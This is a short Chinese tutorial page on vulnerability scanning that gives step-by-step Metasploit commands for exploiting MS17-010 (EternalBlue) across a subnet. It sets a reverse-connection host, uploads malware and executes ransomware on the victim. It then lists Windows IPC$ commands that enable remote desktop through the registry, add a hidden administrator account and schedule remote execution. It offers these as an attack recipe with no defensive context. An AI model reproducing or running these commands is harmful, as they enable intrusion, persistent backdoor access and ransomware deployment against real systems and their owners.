赞
踩
定义
扫描和探测目标范围内的主机存在哪些安全漏洞,或扫描目标范围内的那些主机存在某个指定的漏洞
漏扫工具
AWVS
APPScan
MSF
1.搜索需要的攻击模块
search ms17-010
2.使用攻击模块
use 模块名称
3.设置扫描范围
set rhosts 192.168.12.0/24
4.设置扫描线程
set thread 50
5.开始扫描
run
6.更换攻击模块为漏洞利用
7.查看可用攻击载荷
show payloads
8.设置攻击载荷
set payload 攻击载荷名称
9.设置被攻击主机IP地址
set rhost IP地址
10.设置反向连接的控制机IP地址
set lhost IP地址
11.开始攻击
run
12.上传病毒
upload 本地文件路径 远程主机路径
13.执行勒索病毒
execute -f 勒索病毒路径
确定对方是Windows系统开启了445接口
net use \\对方ip地址\ipc$
需要输入对方的管理员账号密码
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user 用户名 密码 /add
net local group administrator 用户名 /add
在文件资源管理器地址栏中输入 \\对方IP地址\c$
net time \\对方IP地址
at \\对方ip地址 时间 执行的文件路径
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。